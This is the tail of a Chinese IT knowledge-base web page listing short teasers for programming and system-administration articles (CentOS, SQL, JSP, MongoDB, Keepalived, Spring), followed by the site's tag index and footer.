<div>不同流量源的比例反映了网站所有者不同的管理策略和网站的发展阶段。那么,网站流量来源都有哪些?接下来小编就跟大家浅析下网站流量来源的三大途径,一起来看看吧!1、直接访问来源搜索引擎源和外部链源依赖于外部,因此通常存在较大的不确定性,如搜索引擎算法调整、业务模型调整、策略监管等,这可能会使网站的流量从每天数十万IP急剧下降到数千。对于小型商业站来说,从搜索引擎获取流量是一种更经济实惠、廉价的选择,但对</div> </li> <li><a href="/article/1902595731202568192.htm" title="centOS7使用yum安装报错的解决办法" target="_blank">centOS7使用yum安装报错的解决办法</a> <span class="text-muted">小泊客</span> <a class="tag" taget="_blank" href="/search/lLinux%E5%AD%A6%E4%B9%A0/1.htm">lLinux学习</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/ssh/1.htm">ssh</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4%E5%BC%80%E5%8F%91/1.htm">运维开发</a> <div>一、错误提示信息:[root@localhost/]#sudoyuminstallbash-completionCouldnotretrievemirrorlisthttp://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os&infra=stockerrorwas14:curl#7-"Failedtoconnectto2a05:d012:8</div> </li> <li><a href="/article/1902594848398045184.htm" title="Python前端开发" target="_blank">Python前端开发</a> <span class="text-muted">PITSU</span> <a class="tag" taget="_blank" href="/search/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/1.htm">正则表达式</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/css3/1.htm">css3</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>Python前端开发1.前端三剑客(HTML,CSS和JavaScript)1.1HTML1.1.1HTML简介HyperTextMark-upLanguage,指的是超文本标记语言;html是开发网页的语言;html中的标签大多数都是成对出现的,格式:1.1.2HTML结构第一行是文档声明部分HTML:分为页头,页身和页脚。标签大部分是成对出现1.1.3第一行文档声明部分HTML在vscode中</div> </li> <li><a href="/article/102.htm" title="xml解析" target="_blank">xml解析</a> <span class="text-muted">小猪猪08</span> <a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a> <div>1、DOM解析的步奏 准备工作:    1.创建DocumentBuilderFactory的对象    2.创建DocumentBuilder对象    3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件    4.通过Document的getElem</div> </li> <li><a href="/article/229.htm" title="每个开发人员都需要了解的一个SQL技巧" target="_blank">每个开发人员都需要了解的一个SQL技巧</a> <span class="text-muted">brotherlamp</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/linux%E8%A7%86%E9%A2%91/1.htm">linux视频</a><a class="tag" taget="_blank" href="/search/linux%E6%95%99%E7%A8%8B/1.htm">linux教程</a><a class="tag" taget="_blank" href="/search/linux%E8%87%AA%E5%AD%A6/1.htm">linux自学</a><a class="tag" taget="_blank" href="/search/linux%E8%B5%84%E6%96%99/1.htm">linux资料</a> <div>  对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷,比如说它们是应用到表上面的,但有的时候你可能希望指定一条约束,而它只在特定条件下才生效。 使用SQL标准的WITH CHECK OPTION子句就能完成这点,至少Oracle和SQL Server都实现了这个功能。下面是实现方式: CREATE TABLE books (   id &</div> </li> <li><a href="/article/356.htm" title="Quartz——CronTrigger触发器" target="_blank">Quartz——CronTrigger触发器</a> <span class="text-muted">eksliang</span> <a class="tag" taget="_blank" href="/search/quartz/1.htm">quartz</a><a class="tag" taget="_blank" href="/search/CronTrigger/1.htm">CronTrigger</a> <div>转载请出自出处:http://eksliang.iteye.com/blog/2208295 一.概述 CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案,调度规则基于 Cron 表达式,CronTrigger 支持日历相关的重复时间间隔(比如每月第一个周一执行),而不是简单的周期时间间隔。 二.Cron表达式介绍 1)Cron表达式规则表 Quartz</div> </li> <li><a href="/article/483.htm" title="Informatica基础" target="_blank">Informatica基础</a> <span class="text-muted">18289753290</span> <a class="tag" taget="_blank" href="/search/Informatica/1.htm">Informatica</a><a class="tag" taget="_blank" href="/search/Monitor/1.htm">Monitor</a><a class="tag" taget="_blank" href="/search/manager/1.htm">manager</a><a class="tag" taget="_blank" href="/search/workflow/1.htm">workflow</a><a class="tag" taget="_blank" href="/search/Designer/1.htm">Designer</a> <div>1. 1)PowerCenter Designer:设计开发环境,定义源及目标数据结构;设计转换规则,生成ETL映射。 2)Workflow  Manager:合理地实现复杂的ETL工作流,基于时间,事件的作业调度 3)Workflow  Monitor:监控Workflow和Session运行情况,生成日志和报告 4)Repository  Manager:</div> </li> <li><a href="/article/610.htm" title="linux下为程序创建启动和关闭的的sh文件,scrapyd为例" target="_blank">linux下为程序创建启动和关闭的的sh文件,scrapyd为例</a> <span class="text-muted">酷的飞上天空</span> <a class="tag" taget="_blank" href="/search/scrapy/1.htm">scrapy</a> <div>对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径,想到可以做一个简单的启动和关闭控制的文件   下面以scrapy启动server为例,文件名为run.sh:   #端口号,根据此端口号确定PID PORT=6800 #启动命令所在目录 HOME='/home/jmscra/scrapy/' #查询出监听了PORT端口</div> </li> <li><a href="/article/737.htm" title="人--自私与无私" target="_blank">人--自私与无私</a> <span class="text-muted">永夜-极光</span> <div>            今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么?               从客观的角度来看,人有自私的行为,也有无私的</div> </li> <li><a href="/article/864.htm" title="Ubuntu安装NS-3 环境脚本" target="_blank">Ubuntu安装NS-3 环境脚本</a> <span class="text-muted">随便小屋</span> <a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a> <div>  将附件下载下来之后解压,将解压后的文件ns3environment.sh复制到下载目录下(其实放在哪里都可以,就是为了和我下面的命令相统一)。输入命令:   sudo ./ns3environment.sh >>result   这样系统就自动安装ns3的环境,运行的结果在result文件中,如果提示     com</div> </li> <li><a href="/article/991.htm" title="创业的简单感受" target="_blank">创业的简单感受</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/%E5%88%9B%E4%B8%9A%E7%9A%84%E7%AE%80%E5%8D%95%E6%84%9F%E5%8F%97/1.htm">创业的简单感受</a> <div>        2009年11月9日我进入a公司实习,2012年4月26日,我离开a公司,开始自己的创业之旅。      今天是2012年5月30日,我忽然很想谈谈自己创业一个月的感受。 当初离开边锋时,我就对自己说:“自己选择的路,就是跪着也要把他走完”,我也做好了心理准备,准备迎接一次次的困难。我这次走出来,不管成败</div> </li> <li><a href="/article/1118.htm" title="如何经营自己的独立人脉" target="_blank">如何经营自己的独立人脉</a> <span class="text-muted">aoyouzi</span> <a class="tag" taget="_blank" href="/search/%E5%A6%82%E4%BD%95%E7%BB%8F%E8%90%A5%E8%87%AA%E5%B7%B1%E7%9A%84%E7%8B%AC%E7%AB%8B%E4%BA%BA%E8%84%89/1.htm">如何经营自己的独立人脉</a> <div>独立人脉不是父母、亲戚的人脉,而是自己主动投入构造的人脉圈。“放长线,钓大鱼”,先行投入才能产生后续产出。   现在几乎做所有的事情都需要人脉。以银行柜员为例,需要拉储户,而其本质就是社会人脉,就是社交!很多人都说,人脉我不行,因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行,怎么能建立人脉?我这里说的人脉,是你的独立人脉。   以一个普通的银行柜员</div> </li> <li><a href="/article/1245.htm" title="JSP基础" target="_blank">JSP基础</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/%E6%B3%A8%E9%87%8A/1.htm">注释</a><a class="tag" taget="_blank" href="/search/%E9%9A%90%E5%BC%8F%E5%AF%B9%E8%B1%A1/1.htm">隐式对象</a> <div>  1,JSP语句的声明 <%! 声明 %>    声明:这个就是提供java代码声明变量、方法等的场所。 表达式 <%= 表达式 %>    这个相当于赋值,可以在页面上显示表达式的结果, 程序代码段/小型指令 <% 程序代码片段 %>   2,JSP的注释   <!-- --> </div> </li> <li><a href="/article/1372.htm" title="web.xml之session-config、mime-mapping" target="_blank">web.xml之session-config、mime-mapping</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/web.xml/1.htm">web.xml</a><a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a><a class="tag" taget="_blank" href="/search/session-config/1.htm">session-config</a><a class="tag" taget="_blank" href="/search/mime-mapping/1.htm">mime-mapping</a> <div>session-config 1.定义: <session-config> <session-timeout>20</session-timeout> </session-config> 2.作用:用于定义整个WEB站点session的有效期限,单位是分钟。   mime-mapping 1.定义: <mime-m</div> </li> <li><a href="/article/1499.htm" title="互联网开放平台(1)" target="_blank">互联网开放平台(1)</a> <span class="text-muted">Bill_chen</span> <a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91/1.htm">互联网</a><a class="tag" taget="_blank" href="/search/qq/1.htm">qq</a><a class="tag" taget="_blank" href="/search/%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A/1.htm">新浪微博</a><a class="tag" taget="_blank" href="/search/%E7%99%BE%E5%BA%A6/1.htm">百度</a><a class="tag" taget="_blank" href="/search/%E8%85%BE%E8%AE%AF/1.htm">腾讯</a> <div>现在各互联网公司都推出了自己的开放平台供用户创造自己的应用,互联网的开放技术欣欣向荣,自己总结如下: 1.淘宝开放平台(TOP) 网址:http://open.taobao.com/ 依赖淘宝强大的电子商务数据,将淘宝内部业务数据作为API开放出去,同时将外部ISV的应用引入进来。 目前TOP的三条主线: TOP访问网站:open.taobao.com ISV后台:my.open.ta</div> </li> <li><a href="/article/1626.htm" title="【MongoDB学习笔记九】MongoDB索引" target="_blank">【MongoDB学习笔记九】MongoDB索引</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a> <div>索引 可以在任意列上建立索引 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 使用索引可以加快查询,但同时会降低修改,插入等的性能 内嵌文档照样可以建立使用索引 测试数据     var p1 = { "name":"Jack", "age&q</div> </li> <li><a href="/article/1753.htm" title="JDBC常用API之外的总结" target="_blank">JDBC常用API之外的总结</a> <span class="text-muted">白糖_</span> <a class="tag" taget="_blank" href="/search/jdbc/1.htm">jdbc</a> <div> 做JAVA的人玩JDBC肯定已经很熟练了,像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦,我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了,在这我介绍一些写框架时常用的API,大家共同学习吧。     ResultSetMetaData获取ResultSet对象的元数据信息 </div> </li> <li><a href="/article/1880.htm" title="apache VelocityEngine使用记录" target="_blank">apache VelocityEngine使用记录</a> <span class="text-muted">bozch</span> <a class="tag" taget="_blank" href="/search/VelocityEngine/1.htm">VelocityEngine</a> <div>VelocityEngine是一个模板引擎,能够基于模板生成指定的文件代码。   使用方法如下:     VelocityEngine engine = new VelocityEngine();// 定义模板引擎     Properties properties = new Properties();// 模板引擎属</div> </li> <li><a href="/article/2007.htm" title="编程之美-快速找出故障机器" target="_blank">编程之美-快速找出故障机器</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/1.htm">编程之美</a> <div> package beautyOfCoding; import java.util.Arrays; public class TheLostID { /*编程之美 假设一个机器仅存储一个标号为ID的记录,假设机器总量在10亿以下且ID是小于10亿的整数,假设每份数据保存两个备份,这样就有两个机器存储了同样的数据。 1.假设在某个时间得到一个数据文件ID的列表,是</div> </li> <li><a href="/article/2134.htm" title="关于Java中redirect与forward的区别" target="_blank">关于Java中redirect与forward的区别</a> <span class="text-muted">chenbowen00</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a> <div>在Servlet中两种实现: forward方式:request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); redirect方式:response.sendRedirect(“/somePage.jsp”); forward是服务器内部重定向,程序收到请求后重新定向到另一个程序,客户机并不知</div> </li> <li><a href="/article/2261.htm" title="[信号与系统]人体最关键的两个信号节点" target="_blank">[信号与系统]人体最关键的两个信号节点</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F/1.htm">系统</a> <div>         如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门         如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的</div> </li> <li><a href="/article/2388.htm" title="oracle 存储过程执行权限" target="_blank">oracle 存储过程执行权限</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/1.htm">存储过程</a><a class="tag" taget="_blank" href="/search/%E6%9D%83%E9%99%90/1.htm">权限</a><a class="tag" taget="_blank" href="/search/%E6%89%A7%E8%A1%8C%E8%80%85/1.htm">执行者</a><a class="tag" taget="_blank" href="/search/%E8%B0%83%E7%94%A8%E8%80%85/1.htm">调用者</a> <div>在数据库系统中存储过程是必不可少的利器,存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了,说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能,其中涉及到判断一张表是否已经建立,没有建立就由存储过程来建立这张表。 CREATE OR REPLACE PROCEDURE TestProc  IS    fla</div> </li> <li><a href="/article/2515.htm" title="为mysql数据库建立索引" target="_blank">为mysql数据库建立索引</a> <span class="text-muted">dengkane</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E6%80%A7%E8%83%BD/1.htm">性能</a><a class="tag" taget="_blank" href="/search/%E7%B4%A2%E5%BC%95/1.htm">索引</a> <div>前些时候,一位颇高级的程序员居然问我什么叫做索引,令我感到十分的惊奇,我想这绝不会是沧海一粟,因为有成千上万的开发者(可能大部分是使用MySQL的)都没有受过有关数据库的正规培训,尽管他们都为客户做过一些开发,但却对如何为数据库建立适当的索引所知较少,因此我起了写一篇相关文章的念头。  最普通的情况,是为出现在where子句的字段建一个索引。为方便讲述,我们先建立一个如下的表。</div> </li> <li><a href="/article/2642.htm" title="学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例" target="_blank">学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a> <div>如果看懂一个程序,分三步   1、流程   2、每个语句的功能   3、试数   如何学习一些小算法的程序 尝试自己去编程解决它,大部分人都自己无法解决 如果解决不了就看答案 关键是把答案看懂,这个是要花很大的精力,也是我们学习的重点 看懂之后尝试自己去修改程序,并且知道修改之后程序的不同输出结果的含义 照着答案去敲 调试错误 </div> </li> <li><a href="/article/2769.htm" title="centos6.3安装php5.4报错" target="_blank">centos6.3安装php5.4报错</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/centos6/1.htm">centos6</a> <div>报错内容如下: Resolving Dependencies --> Running transaction check ---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed --> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for </div> </li> <li><a href="/article/2896.htm" title="JSONP请求" target="_blank">JSONP请求</a> <span class="text-muted">flyer0126</span> <a class="tag" taget="_blank" href="/search/jsonp/1.htm">jsonp</a> <div>      使用jsonp不能发起POST请求。 It is not possible to make a JSONP POST request. JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos</div> </li> <li><a href="/article/3023.htm" title="Spring Security(03)——核心类简介" target="_blank">Spring Security(03)——核心类简介</a> <span class="text-muted">234390216</span> <a class="tag" taget="_blank" href="/search/Authentication/1.htm">Authentication</a> <div>核心类简介 目录 1.1     Authentication 1.2     SecurityContextHolder 1.3     AuthenticationManager和AuthenticationProvider 1.3.1  &nb</div> </li> <li><a href="/article/3150.htm" title="在CentOS上部署JAVA服务" target="_blank">在CentOS上部署JAVA服务</a> <span class="text-muted">java--hhf</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a><a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a><a class="tag" taget="_blank" href="/search/Java%E6%9C%8D%E5%8A%A1/1.htm">Java服务</a> <div>    本文将介绍如何在CentOS上运行Java Web服务,其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行     第一步:卸载旧Linux自带的JDK ①查看本机JDK版本 java -version    结果如下 java version "1.6.0"</div> </li> <li><a href="/article/3277.htm" title="oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date]" target="_blank">oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date]</a> <span class="text-muted">ldzyz007</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a> <div>oracle                                &n</div> </li> <li><a href="/article/3404.htm" title="记Protocol Oriented Programming in Swift of WWDC 2015" target="_blank">记Protocol Oriented Programming in Swift of WWDC 2015</a> <span class="text-muted">ningandjin</span> <a class="tag" taget="_blank" href="/search/protocol/1.htm">protocol</a><a class="tag" taget="_blank" href="/search/WWDC+2015/1.htm">WWDC 2015</a><a class="tag" taget="_blank" href="/search/Swift2.0/1.htm">Swift2.0</a> <div>其实最先朋友让我就这个题目写篇文章的时候,我是拒绝的,因为觉得苹果就是在炒冷饭, 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲,看完整个Session之后呢,虽然还是觉得在炒冷饭,但是毕竟还是加了蛋的,有些东西还是值得说说的。 通常谈到面向接口编程,其主要作用是把系统设计和具体实现分离开,让系统的每个部分都可以在不影响别的部分的情况下,改变自身的具体实现。接口的设计就反映了系统</div> </li> <li><a href="/article/3531.htm" title="搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS" target="_blank">搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS</a> <span class="text-muted">rensanning</span> <a class="tag" taget="_blank" href="/search/keepalived/1.htm">keepalived</a> <div>(一)Keepalived (1)安装 # cd /usr/local/src # wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz # tar zxvf keepalived-1.2.15.tar.gz # cd keepalived-1.2.15 # ./configure # make &a</div> </li> <li><a href="/article/3658.htm" title="ORACLE数据库SCN和时间的互相转换" target="_blank">ORACLE数据库SCN和时间的互相转换</a> <span class="text-muted">tomcat_oracle</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a> <div>SCN(System Change Number 简称 SCN)是当Oracle数据库更新后,由DBMS自动维护去累积递增的一个数字,可以理解成ORACLE数据库的时间戳,从ORACLE 10G开始,提供了函数可以实现SCN和时间进行相互转换;    用途:在进行数据库的还原和利用数据库的闪回功能时,进行SCN和时间的转换就变的非常必要了;    操作方法:   1、通过dbms_f</div> </li> <li><a href="/article/3785.htm" title="Spring MVC 方法注解拦截器" target="_blank">Spring MVC 方法注解拦截器</a> <span class="text-muted">xp9802</span> <a class="tag" taget="_blank" href="/search/spring+mvc/1.htm">spring mvc</a> <div>应用场景,在方法级别对本次调用进行鉴权,如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器,获得本次请求的用户,存放到request或者session域。 python中,之前在python flask中可以使用装饰器来对方法进行预处理,进行权限处理 先看一个实例,使用@access_required拦截: ? </div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>